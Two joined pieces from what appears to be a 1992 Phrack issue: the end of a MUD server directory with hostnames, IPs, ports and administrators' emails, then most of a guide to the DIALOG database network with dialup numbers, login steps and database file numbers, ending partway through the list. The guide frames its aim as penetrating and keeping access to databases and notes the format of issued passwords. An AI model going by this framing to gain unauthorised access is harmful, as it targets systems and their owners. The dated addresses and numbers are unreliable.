*Genesis milou.cd.chalmers.se 129.16.79.12 2000 up 36
|
|
*Igor epsilon.me.chalmers.se 129.16.50.30 1701 up
|
|
ImperialMUD aix.rpi.edu 128.113.26.11 2000 up 37
|
|
Ivory Tower brown-swiss.macc.wisc. 128.104.30.151 2000 R 27
|
|
edu
|
|
Kobra duteca4.et.tudelft.nl 130.161.144.22 8888 up
|
|
LPSwat aviator.cc.iastate.edu 129.186.140.6 2020 up
|
|
Marches of chema.ucsd.edu 132.239.68.1 3000 up
|
|
Antan
|
|
Middle-Earth oba.dcs.gla.ac.uk 130.209.240.66 3000 up 38
|
|
Muddog Mud phaedrus.math.ufl.edu 128.227.168.2 2000 up
|
|
Mystic ohm.gmu.edu 129.174.1.33 4000 up
|
|
NANVAENT saddle.ccsun.strath.ac. 130.159.208.54 3000 up 24
|
|
uk
|
|
Nameless complex.is 130.208.165.231 2000 up
|
|
Nanny lysator.liu.se 130.236.254.1 2000 up
|
|
NeXT ???? 152.13.1.5 2000 up
|
|
Nemesis dszenger9.informatik. 131.159.8.67 2000 up
|
|
tu-muenchen.de
|
|
*Nightfall nova.tat.physik. 134.2.62.161 4242 up
|
|
uni-tuebingen.de
|
|
Nightmare orlith.bates.edu 134.181.1.12 2666 R
|
|
Nirvana 4 elof.iit.edu 192.41.245.90 3500 up
|
|
Nuage fifi.univ-lyon1.fr 134.214.100.21 2000 R
|
|
*Overdrive im1.lcs.mit.edu 18.52.0.151 5195 up
|
|
PaderMUD athene.uni-paderborn.de 131.234.2.32 4242 up
|
|
PixieMud elof.iit.edu 192.41.245.90 6969 up
|
|
QUOVADIS disun29.epfl.ch 128.178.79.77 2345 up
|
|
Realmsmud hammerhead.cs.indiana. 129.79.251.8 2000 up
|
|
edu
|
|
Ringworld ???? 130.199.96.45 3469 R* 34
|
|
Round Table engr71.scu.edu 129.210.16.71 2222 up
|
|
Sky Realms maxheadroom.agps.lanl. 192.12.184.10 2000 R*
|
|
gov
|
|
SmileyMud elof.iit.edu 192.41.245.90 5150 up
|
|
StickMUD palikka.jyu.fi 130.234.0.3 7680 up
|
|
SvenskMUD lysator.liu.se 130.236.254.1 2043 up 39
|
|
*The Mud dogstar.colorado.edu 128.138.248.32 5555 up
|
|
Institute
|
|
Top Mud lonestar.utsa.edu 129.115.120.1 2001 up
|
|
Tsunami II gonzo.cc.wwu.edu 140.160.240.20 2777 R* 20
|
|
TubMUD morgen.cs.tu-berlin.de 130.149.19.20 7680 up
|
|
Valhalla wiretap.spies.com 130.43.3.3 2444 up
|
|
Valkyrie Prime fozzie.cc.wwu.edu 140.160.240.21 2777 up
|
|
VikingMUD swix.ifi.unit.no 129.241.163.51 2001 up
|
|
Vincent's aviator.cc.iastate.edu 129.186.140.6 1991 up 31
|
|
Hollow
|
|
World of Mizar delial.docs.uu.se 130.238.8.40 9000 R
|
|
------------------------------------------------------------------------------
|
|
mage (1)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
SynthMAGE synth.erc.clarkson.edu 128.153.28.35 4242 TO
|
|
------------------------------------------------------------------------------
|
|
MOOs (1)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Lambda MOO lambda.parc.xerox.com 13.2.116.36 8888 up
|
|
------------------------------------------------------------------------------
|
|
TinyMUCKs (12)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
AfterFive pa.itd.com 128.160.2.249 9999 up 31
|
|
Burning Metal amber.ecst.csuchico.edu 132.241.1.43 8088 up
|
|
Crossroads coyote.cs.wmich.edu 141.218.40.40 5823 R*
|
|
FurryMUCK highlandpark.rest.ri.cmu 128.2.254.5 2323 up 8
|
|
edu
|
|
High Seas opus.calstatela.edu 130.182.111.1 4301 up
|
|
Lawries MUD cserve.cs.adfa.oz.au 131.236.20.1 4201 R 7
|
|
PythonMUCK zeus.calpoly.edu 129.65.16.21 4201 up 18
|
|
QWest glia.biostr.washington. 128.95.10.115 9999 up
|
|
edu
|
|
Quartz Paradise quartz.rutgers.edu 128.6.60.6 9999 up 40
|
|
Time Traveller betz.biostr.washington. 128.95.10.119 4096 up
|
|
edu
|
|
TinyMUD Classic winner.itd.com 128.160.2.248 2000 R 41
|
|
II
|
|
Visions l_cae05.icaen.uiowa.edu 128.255.21.25 2001 R 16
|
|
------------------------------------------------------------------------------
|
|
MUGs (1)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
UglyMUG ???? 130.88.14.17 4201 up
|
|
------------------------------------------------------------------------------
|
|
TinyMUSEs (5)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Fantasia betz.biostr.washington. 128.95.10.119 4201 up 13
|
|
edu
|
|
FantasyMuse case2.cs.usu.edu 129.123.7.19 1701 up 42
|
|
MicroMUSE chezmoto.ai.mit.edu 18.43.0.102 4201 up 6
|
|
Rhostshyl stealth.cit.cornell.edu 128.253.180.15 4201 up 42
|
|
TrekMUSE ecsgate.uncecs.edu 128.109.201.1 1701 R 42
|
|
------------------------------------------------------------------------------
|
|
TinyMUSHes (15)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Dungeon ra.info.sunyit.edu 149.15.1.3 8888 up
|
|
Global MUSH workstation5.colby.edu 137.146.64.237 4201 up
|
|
ImageCastle wizard.etsu.edu 192.43.199.19 4201 up
|
|
Narnia nimitz.mit.edu 18.80.0.161 2555 R*
|
|
PernMUSH milo.mit.edu 18.70.0.216 4201 up 42
|
|
SouthCon utpapa.ph.utexas.edu 128.83.131.52 4201 up 42
|
|
Spellbound thumper.cc.utexas.edu 128.83.135.23 4201 up
|
|
SqueaMUSH ultimo.socs.uts.edu.au 138.25.8.7 6699 R**
|
|
StingMUSH newview.etsu.edu 192.43.199.33 1701 up 42
|
|
TinyCWRU caisr2.caisr.cwru.edu 129.22.24.22 4201 R*
|
|
TinyHORNS louie.cc.utexas.edu 128.83.135.4 4201 up
|
|
TinyTIM II cheetah.ece.clarkson. 128.153.13.54 5440 up
|
|
edu
|
|
VisionMUSH tramp.cc.utexas.edu 128.83.135.26 4567 TO
|
|
------------------------------------------------------------------------------
|
|
TeenyMUDs (3)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
ApexMUD apex.yorku.ca 130.63.7.6 4201 up
|
|
Evil!MUD fido.econ.arizona.edu 128.196.196.1 4201 up
|
|
MetroMUT uokmax.ecn.uoknor.edu 129.15.20.2 5000 R
|
|
------------------------------------------------------------------------------
|
|
TinyMUDs (2)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
DragonMUD ghost.cse.nau.edu 134.114.64.6 4201 up 14
|
|
TinyWORLD rillonia.ssc.gov 143.202.16.13 6250 up
|
|
------------------------------------------------------------------------------
|
|
UnterMUDs (9)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
ChrisMUD hawkwind.utcs.utoronto. 128.100.102.51 6600 up 10
|
|
ca
|
|
DECmud decuac.dec.com 192.5.214.1 6565 up 15
|
|
DreamScape moebius.math.okstate. 139.78.10.3 6250 up 11
|
|
edu
|
|
Islandia hawkwind.utcs.utoronto. 128.100.102.51 2323 up
|
|
ca
|
|
RealWorld cook.brunel.ac.uk 134.83.128.246 4201 up 17
|
|
Sludge unix1.cc.ysu.edu 192.55.234.50 6565 up 19
|
|
Sunmark moebius.math.okstate. 139.78.10.3 6543 up
|
|
edu
|
|
WanderLand sun.ca 192.75.19.1 6666 up 9
|
|
WireHED amber.ecst.csuchico.edu 132.241.1.43 6565 up 12
|
|
------------------------------------------------------------------------------
|
|
YAMUDs (1)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
GooLand toby.cis.uoguelph.ca 131.104.48.112 6715 up
|
|
------------------------------------------------------------------------------
|
|
Notes
|
|
------------------------------------------------------------------------------
|
|
Asterisk (*) before the name indicates that this sites entry was modified in
|
|
the last 7 days.
|
|
|
|
Status field:
|
|
* = last successful connection was more than 7 days ago
|
|
** = last successful connection was more than 30 days ago
|
|
# = no successful connection on record
|
|
R = connection refused
|
|
TO = connection timed out
|
|
HD = host down or unreachable
|
|
ND = network down or unreachable
|
|
NA = insufficient address information available
|
|
|
|
1. administrator is warlock@ecst.csuchico.edu
|
|
2. administrator is jt1o@andrew.cmu.edu
|
|
3. administrator is gamesmgr@taurus.tat.physik.uni-tuebingen.de
|
|
4. administrator is jds@math.okstate.edu
|
|
5. administrator is mjr@decuac.dec.com
|
|
6. send mail to micromuse-registration@michael.ai.mit.edu to register
|
|
7. send mail to Lawrie.Brown@adfa.oz.au to register
|
|
8. send mail to ss7m@andrew.cmu.edu to register
|
|
9. send mail to wanderland@lilith.ebay.sun.com to register
|
|
10. send mail to cks@hawkwind.utcs.toronto.edu to register
|
|
11. send mail to jds@math.okstate.edu to register
|
|
12. send mail to warlock@ecst.csuchico.edu to register
|
|
13. send mail to fantasia@betz.biostr.washington.edu to register
|
|
14. send mail to {jjt,jopsy}@naucse.cse.nau.edu to register
|
|
15. send mail to mjr@decuac.dec.com to register
|
|
16. send mail to schlake@minos.nmt.edu to register
|
|
17. send mail to ee89psw@brunel.ac.uk to register
|
|
18. send mail to {awozniak,claudius}@zeus.calpoly.edu to register
|
|
19. send mail to mud@cc.ysu.edu to register
|
|
20. hours are 0000-1600(M) 0100-1700(TWRF) 0100-2400(S) 0000-2400(U) GMT
|
|
21. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
|
|
22. hours are 1900-0600(MTWRF) 0000-2400(SU) PDT
|
|
23. hours are 1900-0700(MTWRF) 0000-2400(SU)
|
|
24. hours are 1700-0900(MTWRF) 0000-2400(SU) GMT
|
|
25. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
|
|
26. hours are 2100-0900(MTWRF) 0000-2400(SU)
|
|
27. hours are 1630-0800(MTWRF) 0000-2400(SU) CST
|
|
28. hours are 2000-0800(MTWRF) 0000-2400(S) 0000-1200,1700-2400(U) PST
|
|
29. hours are 1800-0800(MTWRF) 0000-2400(SU) CET
|
|
30. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
|
|
31. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
|
|
32. hours are 2000-0800(MTWRF) 0000-2400(SU) CET
|
|
33. hours are 1700-0800(MTWRF) 0000-2400(SU) MST
|
|
34. down until further notice
|
|
35. closed for repairs
|
|
36. the original LP; closed to public
|
|
37. closed to public
|
|
38. closed to players
|
|
39. Swedish-language mud
|
|
40. no pennies
|
|
41. mail agri@pa.itd.com to recover old characters
|
|
42. restricted theme
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 5 of 13
|
|
|
|
***************************************************************************
|
|
* *
|
|
* The Complete Guide To *
|
|
* The DIALOG Information Network *
|
|
* *
|
|
* by *
|
|
* Brian Oblivion *
|
|
* *
|
|
* Courtesy of: Restricted-Data-Transmissions (RDT) *
|
|
* "Truth Is Cheap, But Information Costs." *
|
|
* *
|
|
* 5/9/92 *
|
|
***************************************************************************
|
|
|
|
INTRODUCTION:
|
|
|
|
With the plethora of on-line databases in the public and private sectors,
|
|
I feel it is becoming increasingly important to penetrate and maintain access
|
|
to these databases. The databases in question contain data pertaining to our
|
|
personal lives and to our environment, not to mention the tetrabytes of useful
|
|
information that can be directed toward research and personal education.
|
|
|
|
|
|
Who or What is DIALOG?
|
|
|
|
The DIALOG Information Network is a service that links various public and
|
|
commercial databases together for convenience. In the past, when one wanted to
|
|
access LEGAL RESOURCE INDEX, for instance, one would have to dial direct. With
|
|
DIALOG, hundreds of databases are connected via X.25 networks (Tymnet,
|
|
Sprintnet, Uninet, Dialnet) eliminating frustrating searching and outrageous
|
|
long distance telephone bills (before the AT&T divestiture).
|
|
|
|
Further, within this file is a PARTIAL list of databases found on-line.
|
|
Some of the databases are nothing more than periodicals and abstract sources,
|
|
while others provide FullText articles and books. There are over 2500
|
|
periodicals, newspapers, newsletters and newswires on-line in FullText.
|
|
|
|
Here are a few of my favorites:
|
|
|
|
McGraw-Hill Publications On-Line (File624)
|
|
|
|
- Services offer FullText of their Newsletters serving the world-wide
|
|
aerospace and defense industry. Complete text from 30 newsletters such as
|
|
AeroSpace Daily, BYTE, Aviation Week and Space Technology, Data Communications,
|
|
ENR, among others. For more info on the database, when in DIALOG type Help
|
|
News624.
|
|
|
|
PR NEWSWIRE (File613)
|
|
|
|
- PR Newswire records contain the complete text of news releases prepared
|
|
by: companies; public relations agencies; trade associations; city, state,
|
|
federal and non-US Government agencies; and other sources covering the entire
|
|
spectrum of news. The complete text of a news release typically contains
|
|
details or background information that is not published in newspapers. More
|
|
than 8500 companies contribute news for PR Newswire. PR NEWSWIRE is a known
|
|
agent of Corporate Intelligence.
|
|
|
|
DMS/FI MARKET INTELLIGENCE REPORTS (File589)
|
|
|
|
- FullText of World AeroSpace Weekly, covers all aspects of both civil and
|
|
military aerospace activities worldwide.
|
|
- World Weapons Review, very high degree of technical detail and
|
|
perspective. As such, it has special appeal to military professionals
|
|
and users of weapons.
|
|
|
|
Note: The database treats the newsletters as separate Binders. For example,
|
|
to access the World Weapons Review, after connecting to the database,
|
|
type:
|
|
|
|
SELECT BN=WORLD WEAPONS REVIEW
|
|
or whichever newsletter you wish to search.
|
|
|
|
FINE CHEMICALS DATABASE (File360)
|
|
|
|
- The focus of this database is on sources for laboratory, specialty, and
|
|
unusual chemicals used in scientific research and new product development.
|
|
Fine chemicals are relatively pure chemicals typically produced in small
|
|
quantities. The database will provide you with manufacturers and/or
|
|
distributors.
|
|
|
|
DUN'S ELECTRONIC YELLOW PAGES (File515)
|
|
|
|
- Largest database of U.S. businesses available on DIALOG, providing
|
|
information on a total of 8.5 million establishments. Corporate intelligence:
|
|
you can quickly verify the existence of a business. Then you can obtain
|
|
address, telephone number, employee size, Standard Industrial Classification
|
|
(SIC) and other basic information.
|
|
|
|
CURRENT CONTENTS SEARCH (File440)
|
|
|
|
- FullText articles from over 8000+ worldwide journals dealing with
|
|
science and technology.
|
|
|
|
BOOKS IN PRINT (File470)
|
|
|
|
- Access to in-print and out-of-print books since 1979, BIP lets you
|
|
retrieve bibliographic data on virtually every book published or distributed in
|
|
the United States. Plus FullText reviews on the book(s) you have selected.
|
|
See next.
|
|
|
|
PUBLISHERS DISTRIBUTORS AND WHOLESALERS ON-LINE (File450)
|
|
|
|
- PDW on-line will locate virtually any book, audio cassette, software
|
|
publisher, distributor, or wholesaler in the U.S.
|
|
|
|
You now should have an idea of the power and scope of the Dialog
|
|
Information Network.
|
|
|
|
NOTE: Most of DIALOG's Services are now available to certain Research
|
|
facilities, public and private, on CD-ROM. Check your local public and
|
|
university libraries for this service. Of course, MANY of the more
|
|
interesting databases are not available on CD-ROM and must still be
|
|
accessed through the DIALOG network.
|
|
|
|
|
|
Access to DIALOG Services
|
|
|
|
The following on-line services are available from DIALOG Information
|
|
Services:
|
|
|
|
DIALOG
|
|
DIALOG Business (DBC)
|
|
DIALOG Medical Connection (DMC)
|
|
DIALMAIL
|
|
KNOWLEDGE INDEX
|
|
|
|
The logon procedures for the first four are identical and use the same
|
|
service address; procedures for KNOWLEDGE INDEX differ only in the use of the
|
|
KI service address, as illustrated throughout this file.
|
|
|
|
The most common method of access to DIALOG services uses local phone
|
|
numbers for three telecommunication networks: DIALOG's DIALNET, BT Tymnet,
|
|
TYMNET, and SprintNet. For those who live in an area that lacks a local dialup
|
|
for those three networks, you may use the 800 link into the DIALNET for access
|
|
to all DIALOG services except KNOWLEDGE INDEX. This access is not free, but it
|
|
may cost less than dialing long-distance to reach a network node if you live in
|
|
a region without local access. Access is also available through gateways from
|
|
other on-line systems.
|
|
|
|
Access to many DIALOG services is available from countries throughout the
|
|
world and may be accessed from their own Public Data Networks.
|
|
|
|
Dialnet 800-Number Access
|
|
|
|
The two DIALNET 800 numbers are available for connecting to Dialog services
|
|
from anywhere in the 48 contiguous states. Access through these numbers is not
|
|
free.
|
|
|
|
(800)DIALNET 300, 1200, and 2400 b. (w/MNP error checking)
|
|
(800)342-5638
|
|
|
|
(800)847-1620 VADIC 3400 series modems (1200 baud)
|
|
BELL 103 modems (300 baud)
|
|
BELL 212 modems (1200 baud)
|
|
|
|
Note: I have excluded all the dialup numbers for Tymnet and Sprintnet. If you
|
|
don't know how to find those, obtain a file on X.25 nets and I'm sure
|
|
they will be listed somewhere in them.
|
|
|
|
|
|
DIALNET U.S. DIALUP NUMBERS
|
|
|
|
(All DIALNET dialup numbers support 300, 1200, and 2400 baud)
|
|
|
|
ARIZONA
|
|
Phoenix....................................(602)257-8895
|
|
|
|
CALIFORNIA
|
|
Alhambra...................................(818)300-9000
|
|
Longbeach..................................(213)491-0803
|
|
Los Angeles................................(818)300-9000
|
|
Marina Del Rey.............................(213)305-9833
|
|
Newport Beach..............................(714)756-1969
|
|
Oakland....................................(415)633-7900
|
|
Palo Alto..................................(415)858-2461
|
|
Palo Alto..................................(415)858-2461
|
|
Palo Alto....................................(415)858-2575
|
|
Sacramento.................................(916)444-5030
|
|
San Diego..................................(619)297-8610
|
|
San Francisco..............................(415)957-5910
|
|
San Jose...................................(408)432-0590
|
|
|
|
COLORADO
|
|
Denver.....................................(303)860-9800
|
|
|
|
CONNECTICUT
|
|
Bloomfield/Hartford........................(203)242-5954
|
|
Stamford...................................(203)324-1201
|
|
|
|
DELAWARE
|
|
Wilmington.................................(302)652-1706
|
|
|
|
DISTRICT OF COLUMBIA
|
|
Washington.................................(703)359-2500
|
|
|
|
GEORGIA
|
|
Atlanta....................................(404)455-4221
|
|
|
|
ILLINOIS
|
|
Chicago....................................(312)341-1444
|
|
|
|
INDIANA
|
|
Indianapolis...............................(317)635-7259
|
|
|
|
MARYLAND
|
|
Baltimore..................................(301)234-0940
|
|
|
|
MASSACHUSETTS
|
|
Boston.....................................(617)439-7920
|
|
Lexington..................................(617)862-6240
|
|
|
|
MICHIGAN
|
|
Ann Arbor..................................(313)973-2622
|
|
Detroit....................................(313)964-1309
|
|
|
|
MINNESOTA
|
|
Minneapolis................................(612)338-0676
|
|
|
|
MISSOURI
|
|
St. Louis..................................(314)731-0122
|
|
|
|
NEW JERSEY
|
|
Lyndhurst..................................(201)460-8868
|
|
Morristown.................................(201)292-9646
|
|
Newark.....................................(201)824-1412
|
|
Piscataway.................................(201)562-9680
|
|
Princeton..................................(609)243-9550
|
|
|
|
NEW MEXICO
|
|
Albuquerque................................(505)764-9281
|
|
|
|
NEW YORK
|
|
Albany.....................................(518)458-8710
|
|
Buffalo....................................(716)896-9440
|
|
Hempstead..................................(516)489-6868
|
|
New York City..............................(212)422-0410
|
|
Rochester..................................(716)458-7300
|
|
White Plains...............................(914)328-7810
|
|
|
|
NORTH CAROLINA
|
|
Research Triangle..........................(919)549-9290
|
|
|
|
OHIO
|
|
Cincinnati.................................(513)489-3980
|
|
Cleveland..................................(216)621-3807
|
|
Columbus...................................(614)461-8348
|
|
Dayton.....................................(513)898-8878
|
|
|
|
OREGON
|
|
Portland...................................(503)228-2771
|
|
|
|
PENNSYLVANIA
|
|
Allentown..................................(215)776-2030
|
|
Philadelphia...............................(215)923-5214
|
|
Pittsburg..................................(412)471-1421
|
|
Valley Forge/Norristown....................(215)666-1500
|
|
|
|
TEXAS
|
|
Austin.....................................(512)462-9494
|
|
Dallas.....................................(214)631-9861
|
|
Houston....................................(713)531-0505
|
|
|
|
UTAH
|
|
Salt Lake City.............................(801)532-3071
|
|
|
|
VIRGINIA
|
|
Fairfax....................................(703)359-2500
|
|
|
|
WASHINGTON
|
|
Seattle....................................(206)282-5009
|
|
|
|
WISCONSIN
|
|
Milwaukee..................................(414)796-1785
|
|
|
|
|
|
Access to Dialog Outside of the US
|
|
|
|
Foreign readers may access Dialog via the INFONET PDN. The following
|
|
numbers are for those particular users.
|
|
|
|
BELGIUM
|
|
Brussels (300).............................(02)648-0710
|
|
Brussels (1200)............................(02)640-4993
|
|
|
|
DENMARK
|
|
Copenhagen (300)...........................(01)22-10-66
|
|
Copenhagen (1200)..........................(01)22-41-22
|
|
Logging in to DIALOG or KNOWLEDGE INDEX (KI)
|
|
|
|
After dialing the appropriate number and establishing the connection, you
|
|
must allow a 10-second delay and then enter the letter A (or a carriage return
|
|
or another terminal identifier from the table below) before any further
|
|
response will occur. Then, follow the remainder of the procedures show below.
|
|
|
|
DIALOG Information Services' DIALNET
|
|
-2151:01-012-
|
|
Enter Service: dialog Enter DIALOG or KI;
|
|
|
|
DIALNET: call connected
|
|
DIALOG INFORMATION SERVICES
|
|
PLEASE LOGON:
|
|
?XXXXXXXX Enter User Number
|
|
|
|
ENTER PASSWORD:
|
|
?XXXXXXXX Enter Password;
|
|
|
|
|
|
NOTE: I have researched the method of user number and password distribution
|
|
and all user numbers and passwords are generated by Dialog, BUT upon
|
|
receiving a password from DIALOG you may opt to change it. The
|
|
passwords issued from DIALOG are 8 digits long, consisting of random
|
|
alpha-numeric characters.
|
|
|
|
Once you are connected to your default service or file in DIALOG, you can then
|
|
BEGIN one of the other services; for example, to access DIALMAIL, BEGIN MAIL.
|
|
|
|
DIALNET Terminal Identifiers
|
|
|
|
Speed Identifier Terminal Type Effect
|
|
=---------------------------------------------------------------=
|
|
300 bps ENTER key PCs & CRTs Same as A
|
|
E Thermal Printers Slower
|
|
C Impact Printers Slowest
|
|
G Belt Printer Slower
|
|
|
|
1200 bps ENTER key PCs & CRTs Same as A
|
|
or G Matrix Printers Slower
|
|
2400 bps I Belt Printers Slowest
|
|
|
|
- For access in half duplex, enter a < CTRL H > after the "Enter Service:"
|
|
prompt and before entering the word "dialog" or "ki."
|
|
|
|
- Don't hit backspace if you make an error in typing "dialog" or "ki." The
|
|
result will be toggling your duplex, reason being your backspace is usually
|
|
configured to send a < CTRL H > to delete to the left of the cursor one
|
|
space.
|
|
|
|
DIALNET Messages
|
|
|
|
Message Probable Cause User Action
|
|
|
|
ERROR, RE-ENTER SERVICE Incorrect host name Check typing
|
|
|
|
ALL PORTS BUSY All DIALOG ports Try in a few min.
|
|
are temporarily in
|
|
use.
|
|
|
|
HOST DOWN DIALOG computer is Try in a few min.
|
|
not available.
|
|
|
|
HOST NOT RESPONDING DIALOG Computer Try in a few min.
|
|
difficulty
|
|
|
|
CIRCUITS BUSY DIALNET Network is Try in a few min.
|
|
temporarily busy.
|
|
|
|
DIALNET: CALL CLEARED Appears after LOGOFF
|
|
BY REQUEST to indicate connection
|
|
ENTER SERVICE: to DIALOG is broken.
|
|
|
|
DROPPED BY HOST SYSTEM Indicates a system failure
|
|
at DIALOG.
|
|
|
|
|
|
Navigating in DIALOG
|
|
|
|
|
|
To begin a search, one would enter:
|
|
|
|
BEGIN xxxx
|
|
|
|
xxxx would be the database file number. All databases found on DIALOG are
|
|
assigned file numbers. The searching protocol used to manipulate DIALOG seems
|
|
at times to be a language in itself, but it can be easily learned and mastered.
|
|
|
|
|
|
DIALOG HOMEBASE
|
|
|
|
I would advise the first-timer to jump into the DIALOG Homebase Menu,
|
|
which provides information, help, file of the month, database info and rates,
|
|
the DIALINDEX, DIALOG Training, and announcements. DIALOG also provides
|
|
subscribers with special services which include dialouts for certain area
|
|
codes. You can begin the DIALOG HOMBASE by typing:
|
|
|
|
BEGIN HOME
|
|
|
|
=-**************************************************************-=
|
|
|
|
|
|
DIALOG DATABASES
|
|
|
|
File Number Database
|
|
15 ABI/INFORM
|
|
180 Academic American Encyclopedia
|
|
43 ADTRACT
|
|
108 Aerospace Database
|
|
10,110 AGRICOLA
|
|
9 AIM/ARM
|
|
38 America:History & Life
|
|
236 American Men & Women of Science
|
|
258,259 AP NEWS
|
|
45 APTIC
|
|
112 Aquaculture
|
|
116 Aqualine
|
|
44 Aquatic Science & Fisheries ABS
|
|
56 Art Bibliographies, Modern
|
|
192 Arthur D. Little On-Line
|
|
102 ASI
|
|
285 BIOBUSINESS
|
|
287,288 Biography Master Index
|
|
5, 55
|
|
255 BIOSIS Previews
|
|
175 BLS Consumer Price Index
|
|
178 BLS Employment, Hours, and Earnings
|
|
176 BLS Producer Price Index
|
|
137 Book Review Index
|
|
470 Books In Print
|
|
256 Business Software Database
|
|
308-311
|
|
320 CA Search
|
|
50 CAB Abstracts
|
|
262 Canadian Business and Current Affairs
|
|
162 Career Placement Registry/ Experienced Personnel
|
|
163 Career Placement Reg/Student
|
|
580 CENDATA
|
|
138 Chemical Exposure
|
|
19 Chemical Industry Notes
|
|
174 Chem Regulations & Guidelines
|
|
300,301 CHEMNAME, CHEMSIS
|
|
328-331 CHEMZERO
|
|
30 CHEMSEARCH
|
|
64 Chile Abuse & Neglect
|
|
410 Chronolog Newsletter-International Edition
|
|
101 Compuserve Information Service
|
|
220-222 CLAIMS Citation
|
|
124 CLAIMS Class
|
|
242 CLAIMS Compound Registry
|
|
23-25,125
|
|
223-225 CLAIMS US Patents
|
|
123 CLAIMS Reassignment & Re-examination
|
|
219 Clinical Abstracts
|
|
164 Coffeeline
|
|
194-195 Commerce Business Daily
|
|
593 Compare Products
|
|
8 Compendex
|
|
275 The Computer Database
|
|
77 Conference Papers Index
|
|
135 Congressional Record Abstracts
|
|
271 Consumer Drug Info Fulltext
|
|
171 Criminal Justice Period Index
|
|
60 CRIS/USDA
|
|
230 DATABASE OF DATABASES
|
|
516 D&B - Dun's Market Identifiers
|
|
517 D&B - Million Dollar Directory
|
|
518 D&B - International Dun's Market Identifiers
|
|
411 DIALINDEX
|
|
200 DIALOG PUBLICATIONS
|
|
100 Disclosure II
|
|
540 Disclosure Spectrum Ownership
|
|
35 Dissertation Abstracts On-Line
|
|
103,104 DOE Energy
|
|
575 Donnelley Demographics
|
|
229 Drug Information Fulltext
|
|
139 Economic Literature Index
|
|
165 Ei Engineering Meetings
|
|
241 Electric Power Database
|
|
511 Electronic Dictionary of Education
|
|
507 Construction Directory
|
|
501 Financial Services Directory
|
|
510 Manufactures Directory
|
|
502 Professionals Directory
|
|
504-506 Retailers Directory
|
|
508,509 Services Directory
|
|
503 Wholesalers Directory
|
|
500 Electronic Yellow Pages Index
|
|
72, 73 EMBASE (Excerpta Medica)
|
|
172,173 EMBASE
|
|
114 Encyclopedia of Associations
|
|
69 Energyline
|
|
169 Energynet
|
|
40 ENVIROLINE
|
|
68 Environmental Bibliography
|
|
1 eric
|
|
54 Exceptional Child Education Resources
|
|
291 Family Resources
|
|
20 Federal Index
|
|
136 Federal Register Abstracts
|
|
265 Federal Research in Progress
|
|
196 Find/SVP Reports and studies Index
|
|
268 FINIS: Financial Industry Information Service
|
|
96 Fluidex
|
|
51 Food Science & Technology Abstracts
|
|
79 Foods Adlibra
|
|
90 Foreign Trade & Econ Abstracts
|
|
105 Foreign Traders Index
|
|
26 Foundation Directory
|
|
27 Foundation Grants Index
|
|
58 Geoarchive
|
|
89 Georef
|
|
66 GPO Monthly Catalog
|
|
166 GPO Publications Reference File
|
|
85 Grants
|
|
122 Harvard Business Review
|
|
151 Health Planning And Administration
|
|
39 Historical Abstracts
|
|
561 ICC British Company Directory
|
|
562 ICC British Financial Datasheets
|
|
189 Industry Data Sources
|
|
202 Information Science Abstracts
|
|
12, 13 INSPEC
|
|
168 Insurance Abstracts
|
|
209 International Listing Service
|
|
74 International Pharmaceutical Abstracts
|
|
545 Investext
|
|
284 IRS TAXiNFO
|
|
14 ISMEC
|
|
244 LABORLAW
|
|
36 Language & Language Behavior Abstracts
|
|
426-427 LC MARC
|
|
150 Legal Resource Index
|
|
76 Life Sciences Collection
|
|
61 LISA
|
|
647 Magazine ASAP
|
|
47 Magazine Index
|
|
75 Management Contents
|
|
234 Marquis Who's Who
|
|
235 Marquis Pro-files
|
|
239 Mathfile
|
|
546 Media General Database
|
|
152-154 MEDLINE
|
|
86 Mental Health Abstracts
|
|
232 Menu The International Software Database
|
|
32 METADEX
|
|
29 Meteor/Geoastrophysical Abstracts
|
|
233 Microcomputer Index
|
|
32 MERADEX
|
|
29 Meteor/Geoastrophysical Abstracts
|
|
233 Microcomputer Index
|
|
248 The Middle East: Abstracts and Index
|
|
249 Mideast File
|
|
71 MLA Bibliography
|
|
555 Moody's Corporate Profiles
|
|
557 Moody's Corporate News-International
|
|
556 Moody's Corporate News - U.S.
|
|
78 National Foundations
|
|
111 National Newspaper News - U.S.
|
|
21 NCJRS
|
|
211 Newsearch
|
|
46 NICEM
|
|
70 NICSEM/NIMIS
|
|
118 Nonferrous Metals Abstracts
|
|
6 NTIS
|
|
218 Nursing & Allied Health
|
|
161 Occupational Safety and Health
|
|
28 Oceanic Abstracts
|
|
170 ON-LINE Chronicle
|
|
215 ONTAP ABI/INFORM
|
|
205 ONTAP BIOSIS Previews
|
|
204 ONTAP CA SEARCH
|
|
250 ONTAP CAB Abstracts
|
|
231 ONTAP Chemname
|
|
208 ONTAP Compendex
|
|
290 ONTAP DIALINDEX
|
|
201 ONTAP ERIC
|
|
272 ONTAP Embase
|
|
213 ONTAP Inspec
|
|
247 ONTAP Magazine Index
|
|
254 ONTAP Medline
|
|
216 ONTAP PTS Promt
|
|
294 ONTAP Scisearch
|
|
207 ONTAP Social Scisearch
|
|
296 ONTAP Trademarkscan
|
|
280 ONTAP World Patents Index
|
|
49 PAIS International
|
|
240 Paperchem
|
|
243 PATLAW
|
|
257 P/E News
|
|
241 Peterson's College Database
|
|
42 Pharmaceutical News Index
|
|
57 Philosopher's Index
|
|
41 Pollution Abstracts
|
|
91 Population Bibliography
|
|
140 PsycALERT
|
|
11 PsycINFO
|
|
17 PTS Annual Reports Abstracts
|
|
80 PTS Defense Markets and Technology
|
|
18 PTS F&S Indexes 80-
|
|
